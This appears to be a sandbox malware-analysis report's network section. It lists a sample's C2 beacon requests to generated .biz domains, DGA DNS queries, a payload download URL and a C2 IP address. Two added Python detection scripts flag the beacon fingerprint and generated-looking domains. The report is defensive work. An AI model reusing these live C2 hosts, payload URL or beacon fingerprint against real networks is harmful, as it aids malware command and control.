                      Source: global traffic | HTTP traffic detected: POST /oiqbeltfrlpts HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /jwvwqanfys HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /rheljawehu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: tbjrpv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /jlc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: deoci.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /iq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gytujflc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /rofptsppofgiww HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gytujflc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /uiwlhtxrxipw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: qaynky.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /gvskbqofkpgv HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: bumxkqgxu.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /sbnrqyxuvimud HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: dwrqljrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /s HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: nqwjmb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /qklr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ytctnunms.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /c HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: myups.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /rjreynucnxubyan HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: myups.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /rsqlwjdrwk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: oshhkdluh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /khvhi HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yunalwv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /xalserxg HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yunalwv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /wt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lrxdmhrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /txsxc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: wllvnzb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /klerpi HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gnqgo.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /qehuuaxgtrfd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jhvzpcfg.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /srktyhawgjwb HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: acwjcqqv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /wdbsnc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yauexmxk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /yngosjtj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: iuzpxe.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /xwpgxeg HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: sxmiywsfv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /hppl HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ftxlah.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /rrrklmujfcwnchb HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: typgfhb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /pggbsfikilutqo HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gvijgjwkh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
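The three network findings above (the "English language letter frequency does not match the domain names" DNS heuristic together with the query count, the run of POST beacons that share one User-Agent and an 832-byte body and go to single-label .biz hosts, and the two AnubisNetworks sinkhole cookie signatures) can be reproduced offline with the script below. It is an added example written for this page, not Joe Sandbox or Emerging Threats code. Its assumptions: the letter-frequency table is the standard English one; the score threshold of -1.5 was picked by hand so that names like api.ipify.org pass and knjghuig.biz fails; the two requests and the response are constructed from values printed in this report rather than captured packets; and the guess that the sinkhole signatures key on the literal strings snkz and btst in the cookie is mine, not taken from the rule text.

```python
"""Offline checks for the DNS and HTTP indicators in this report (added example, not sandbox code)."""
import math
import re
from collections import Counter

# Standard relative frequency of letters in English text, in percent.
ENGLISH_FREQ = {
    "a": 8.2, "b": 1.5, "c": 2.8, "d": 4.3, "e": 12.7, "f": 2.2, "g": 2.0,
    "h": 6.1, "i": 7.0, "j": 0.15, "k": 0.77, "l": 4.0, "m": 2.4, "n": 6.7,
    "o": 7.5, "p": 1.9, "q": 0.095, "r": 6.0, "s": 6.3, "t": 9.1, "u": 2.8,
    "v": 0.98, "w": 2.4, "x": 0.15, "y": 2.0, "z": 0.074,
}
LOG_FREQ = {c: math.log10(p / 100.0) for c, p in ENGLISH_FREQ.items()}
SCORE_THRESHOLD = -1.5  # assumption: hand-picked cut-off, not a value from the report

# Exact User-Agent of the POST beacons listed in the report.
BEACON_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
             "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
             "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")
# Assumption: the ET sinkhole signatures match these literal strings inside Set-Cookie.
SINKHOLE_MARKERS = ("snkz", "btst")


def registrable_label(host):
    """'przvgke' for 'przvgke.biz', 'ipify' for 'api.ipify.org' (single-label suffixes only)."""
    parts = host.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def english_score(label):
    """Mean log10 English probability of the letters in label; higher is more English-like.
    Digits and other non-letters are skipped; None when nothing is left to score."""
    letters = [c for c in label if c in LOG_FREQ]
    if not letters:
        return None
    return sum(LOG_FREQ[c] for c in letters) / len(letters)


def looks_generated(host, threshold=SCORE_THRESHOLD):
    """True when the registrable label fails the letter-frequency test."""
    score = english_score(registrable_label(host))
    return score is not None and score < threshold


def triage_dns(query_names):
    """Total query count plus the distinct names that fail the frequency test."""
    counts = Counter(q.lower() for q in query_names)
    flagged = sorted(name for name in counts if looks_generated(name))
    return sum(counts.values()), flagged


def parse_request(raw):
    """Split a raw HTTP/1.x request head into (method, path, headers with lowercase names)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def beacon_reasons(raw):
    """Reasons a request matches the shape of the report's POST beacons (empty = no match)."""
    method, path, h = parse_request(raw)
    reasons = []
    if method == "POST" and re.fullmatch(r"/[a-z]{1,20}", path):
        reasons.append("POST to a short lowercase path")
    if h.get("user-agent") == BEACON_UA:
        reasons.append("User-Agent identical to the beacon UA")
    if h.get("content-length") == "832":
        reasons.append("fixed 832-byte body")
    host = h.get("host", "")
    if host.endswith(".biz") and looks_generated(host):
        reasons.append("Host is a .biz name that fails the letter-frequency test")
    return reasons


def sinkhole_cookie_hits(raw_response):
    """Markers from SINKHOLE_MARKERS found in any Set-Cookie header of a raw HTTP response."""
    hits = []
    for line in raw_response.split("\r\n"):
        name, _, value = line.partition(":")
        if name.strip().lower() == "set-cookie":
            hits.extend(m for m in SINKHOLE_MARKERS if m in value.lower())
    return hits


# Constructed samples assembled from values shown in the report (not captured packets).
SAMPLE_POST = ("POST /ksc HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
               "Pragma: no-cache\r\nHost: przvgke.biz\r\nUser-Agent: " + BEACON_UA +
               "\r\nContent-Length: 832\r\n\r\n")
SAMPLE_GET = ("GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) "
              "Gecko/20100101 Firefox/99.0\r\nHost: api.ipify.org\r\nConnection: Keep-Alive\r\n\r\n")
SAMPLE_SINKHOLE_RESPONSE = ("HTTP/1.1 200 OK\r\nSet-Cookie: btst=0123abcd; path=/\r\n"
                            "Set-Cookie: snkz=0123abcd; path=/\r\nContent-Length: 0\r\n\r\n")

if __name__ == "__main__":
    print(triage_dns(["api.ipify.org", "api.ipify.org", "knjghuig.biz", "przvgke.biz", "gxe0.com"]))
    print(beacon_reasons(SAMPLE_POST))
    print(beacon_reasons(SAMPLE_GET))
    print(sinkhole_cookie_hits(SAMPLE_SINKHOLE_RESPONSE))
```

The frequency test is deliberately one signal among several: ifsaia.biz from the POST list scores as English-like and passes it, which is why the beacon check also keys on the fixed User-Agent, the constant 832-byte body and the short random path, and why the report pairs the heuristic with the raw query count of 48.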
                      Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (this entry is repeated 50 times in the report)
                      Source: global traffic HTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: gxe0.com
                      Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
                      Source: global traffic DNS traffic detected: DNS query: gxe0.com
                      Source: global traffic DNS traffic detected: DNS query: pywolwnvd.biz
                      Source: global traffic DNS traffic detected: DNS query: ssbzmoy.biz
                      Source: global traffic DNS traffic detected: DNS query: cvgrf.biz
                      Source: global traffic DNS traffic detected: DNS query: api.ipify.org
                      Source: global traffic DNS traffic detected: DNS query: npukfztj.biz
                      Source: global traffic DNS traffic detected: DNS query: przvgke.biz
                      Source: global traffic DNS traffic detected: DNS query: zlenh.biz
                      Source: global traffic DNS traffic detected: DNS query: knjghuig.biz
                      Source: global traffic DNS traffic detected: DNS query: uhxqin.biz
                      Source: global traffic DNS traffic detected: DNS query: anpmnmxo.biz
                      Source: global traffic DNS traffic detected: DNS query: lpuegx.biz
                      Source: global traffic DNS traffic detected: DNS query: s82.gocheapweb.com
                      Source: global traffic DNS traffic detected: DNS query: vjaxhpbji.biz
                      Source: global traffic DNS traffic detected: DNS query: xlfhhhm.biz
                      Source: global traffic DNS traffic detected: DNS query: ifsaia.biz
                      Source: global traffic DNS traffic detected: DNS query: saytjshyf.biz
                      Source: global traffic DNS traffic detected: DNS query: vcddkls.biz
                      Source: global traffic DNS traffic detected: DNS query: fwiwk.biz
                      Source: global traffic DNS traffic detected: DNS query: tbjrpv.biz
                      Source: global traffic DNS traffic detected: DNS query: deoci.biz
                      Source: global traffic DNS traffic detected: DNS query: gytujflc.biz
                      Source: global traffic DNS traffic detected: DNS query: qaynky.biz
                      Source: global traffic DNS traffic detected: DNS query: bumxkqgxu.biz
                      Source: global traffic DNS traffic detected: DNS query: dwrqljrr.biz
                      Source: global traffic DNS traffic detected: DNS query: nqwjmb.biz
                      Source: global traffic DNS traffic detected: DNS query: ytctnunms.biz
                      Source: global traffic DNS traffic detected: DNS query: myups.biz
                      Source: global traffic DNS traffic detected: DNS query: oshhkdluh.biz
                      Source: global traffic DNS traffic detected: DNS query: yunalwv.biz
                      Source: global traffic DNS traffic detected: DNS query: jpskm.biz
                      Source: global traffic DNS traffic detected: DNS query: lrxdmhrr.biz
                      Source: global traffic DNS traffic detected: DNS query: wllvnzb.biz
                      Source: global traffic DNS traffic detected: DNS query: gnqgo.biz
                      Source: global traffic DNS traffic detected: DNS query: jhvzpcfg.biz
                      Source: global traffic DNS traffic detected: DNS query: acwjcqqv.biz
                      Source: global traffic DNS traffic detected: DNS query: lejtdj.biz
                      Source: global traffic DNS traffic detected: DNS query: vyome.biz
                      Source: global traffic DNS traffic detected: DNS query: yauexmxk.biz
                      Source: global traffic DNS traffic detected: DNS query: iuzpxe.biz
                      Source: global traffic DNS traffic detected: DNS query: sxmiywsfv.biz
                      Source: global traffic DNS traffic detected: DNS query: vrrazpdh.biz
                      Source: global traffic DNS traffic detected: DNS query: ftxlah.biz
                      Source: global traffic DNS traffic detected: DNS query: typgfhb.biz
                      Source: global traffic DNS traffic detected: DNS query: esuzf.biz
                      Source: global traffic DNS traffic detected: DNS query: gvijgjwkh.biz
                      Source: global traffic DNS traffic detected: DNS query: qpnczch.biz
                      Source: global traffic DNS traffic detected: DNS query: brsua.biz
                      Source: unknown HTTP traffic detected: POST /lcoyxsnwq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Wed, 20 Nov 2024 09:26:34 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html> followed by six copies of <!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Wed, 20 Nov 2024 09:26:34 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html> followed by six copies of <!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Wed, 20 Nov 2024 09:26:42 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html> followed by six copies of <!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Wed, 20 Nov 2024 09:26:43 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html> followed by six copies of <!-- a padding to disable MSIE and Chrome friendly error page -->
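The request and DNS entries above show one request fingerprint (POST, fixed Content-Length 832, the same WeChat/QQBrowser User-Agent, a random lowercase path) sent to six different random-looking .biz hosts, plus DNS queries for dozens more such hosts; the gxe0.com download and the api.ipify.org external-IP lookups use different fingerprints and a single host each. The Python below is a worked detection example added to this page; it is not part of the Joe Sandbox report or of the analysed sample. It parses report-shaped "HTTP traffic detected" / "DNS traffic detected" lines (a subset of the report's own requests and queries, rebuilt with single spaces between header fields) and flags both patterns: a fingerprint reused against several hosts, and a TLD under which many queried labels look machine-generated. The thresholds (three hosts per fingerprint, five generated-looking labels per TLD, vowel ratio below 0.25 or a consonant run of four or more) are assumptions chosen for illustration, not values from the report.

```python
"""Detection heuristics for the rotating-domain beacon seen in this report.

Added example, not part of the Joe Sandbox report or of the analysed sample.
Parses report-style request/DNS lines and flags:
  1. one request fingerprint (method, User-Agent, Content-Length) reused
     against many distinct hosts, i.e. a beacon that rotates C2 domains;
  2. a TLD under which many queried second-level labels look generated.
All thresholds below are assumptions for illustration.
"""
import re
from collections import defaultdict

# User agents exactly as they appear in the report's request lines.
WECHAT_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
             "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
             "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")
FIREFOX_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0"
WINHTTP_UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"

# Sample input: a subset of the report's requests and DNS queries, rebuilt in the
# report's shape with one space between header fields (constructed test data).
_POST = ("HTTP traffic detected: POST {path} HTTP/1.1 Cache-Control: no-cache "
         "Connection: Keep-Alive Pragma: no-cache Host: {host} User-Agent: "
         + WECHAT_UA + " Content-Length: 832")
SAMPLE_LINES = [
    _POST.format(path=p, host=h) for p, h in [
        ("/lcoyxsnwq", "pywolwnvd.biz"), ("/yngosjtj", "iuzpxe.biz"),
        ("/xwpgxeg", "sxmiywsfv.biz"), ("/hppl", "ftxlah.biz"),
        ("/rrrklmujfcwnchb", "typgfhb.biz"), ("/pggbsfikilutqo", "gvijgjwkh.biz"),
    ]
] + [
    "HTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1 Connection: Keep-Alive "
    "Accept: */* User-Agent: " + WINHTTP_UA + " Host: gxe0.com",
] + [
    "HTTP traffic detected: GET / HTTP/1.1 User-Agent: " + FIREFOX_UA
    + " Host: api.ipify.org Connection: Keep-Alive"
] * 3 + [
    "DNS traffic detected: DNS query: " + h for h in (
        "gxe0.com api.ipify.org s82.gocheapweb.com pywolwnvd.biz ssbzmoy.biz cvgrf.biz "
        "npukfztj.biz xlfhhhm.biz tbjrpv.biz dwrqljrr.biz jhvzpcfg.biz iuzpxe.biz "
        "sxmiywsfv.biz ftxlah.biz typgfhb.biz gvijgjwkh.biz").split()
]

REQ_RE = re.compile(r"HTTP traffic detected: (GET|POST) (\S+) HTTP/1\.[01] (.*)")
# A header boundary is " Name: "; a header value containing ": " would break this.
HDR_RE = re.compile(r"([A-Za-z-]+): (.*?)(?= [A-Za-z-]+: |$)")
DNS_RE = re.compile(r"DNS traffic detected: DNS query: (\S+)")


def parse_requests(lines):
    """Yield (method, path, headers-dict) for every request line."""
    for line in lines:
        m = REQ_RE.search(line)
        if m:
            yield m.group(1), m.group(2), dict(HDR_RE.findall(m.group(3)))


def parse_dns(lines):
    """Return the queried hostnames, lower-cased."""
    return [m.group(1).lower() for m in map(DNS_RE.search, lines) if m]


def beacon_fingerprints(lines, min_hosts=3):
    """Group requests by (method, User-Agent, Content-Length) and return the
    fingerprints that were sent to at least `min_hosts` distinct hosts."""
    seen = defaultdict(lambda: {"hosts": set(), "paths": set()})
    for method, path, hdr in parse_requests(lines):
        key = (method, hdr.get("User-Agent", ""), hdr.get("Content-Length"))
        seen[key]["hosts"].add(hdr.get("Host", "").lower())
        seen[key]["paths"].add(path)
    return {k: v for k, v in seen.items() if len(v["hosts"]) >= min_hosts}


VOWELS = set("aeiou")


def label_features(label):
    """(vowel ratio, longest run of consonant letters); y counts as a consonant,
    digits and hyphens break a run."""
    run = best = 0
    for ch in label:
        if ch.isalpha() and ch not in VOWELS:
            run += 1
            best = max(best, run)
        else:
            run = 0
    return sum(ch in VOWELS for ch in label) / max(len(label), 1), best


def looks_generated(label, max_vowel_ratio=0.25, min_consonant_run=4):
    ratio, run = label_features(label)
    return ratio < max_vowel_ratio or run >= min_consonant_run


def dga_clusters(hosts, min_size=5):
    """Per TLD, the distinct second-level labels that look generated; only TLDs
    with at least `min_size` such labels are returned. The last label is taken
    as the TLD, so multi-part public suffixes (co.uk) are not handled."""
    by_tld = defaultdict(set)
    for host in set(hosts):
        parts = host.rstrip(".").split(".")
        if len(parts) >= 2 and looks_generated(parts[-2]):
            by_tld[parts[-1]].add(parts[-2])
    return {tld: sorted(v) for tld, v in by_tld.items() if len(v) >= min_size}


if __name__ == "__main__":
    for (method, ua, clen), info in beacon_fingerprints(SAMPLE_LINES).items():
        print(f"beacon: {method} body={clen} UA={ua[:40]}... -> "
              f"{len(info['hosts'])} hosts, {len(info['paths'])} distinct paths")
    for tld, labels in dga_clusters(parse_dns(SAMPLE_LINES)).items():
        print(f"generated-looking .{tld} labels: {len(labels)}, e.g. {labels[:3]}")
```

On this input the only fingerprint flagged is the POST with body size 832 and the WeChat/QQBrowser User-Agent, sent to six hosts with six distinct paths; the api.ipify.org GETs repeat three times but hit one host, and gxe0.com is a single download. The per-label heuristic deliberately misses some generated labels (iuzpxe, for example, has a vowel ratio of 0.5), which is why the decision is made on the population, twelve generated-looking labels under one TLD, rather than on any single query. The external-IP lookup at api.ipify.org is better covered by its own rule on that destination than by either heuristic here.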
                      Source: Native_neworigin.exe, 00000009.00000002.2397017499.000000000090A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.234.222.143/ksc
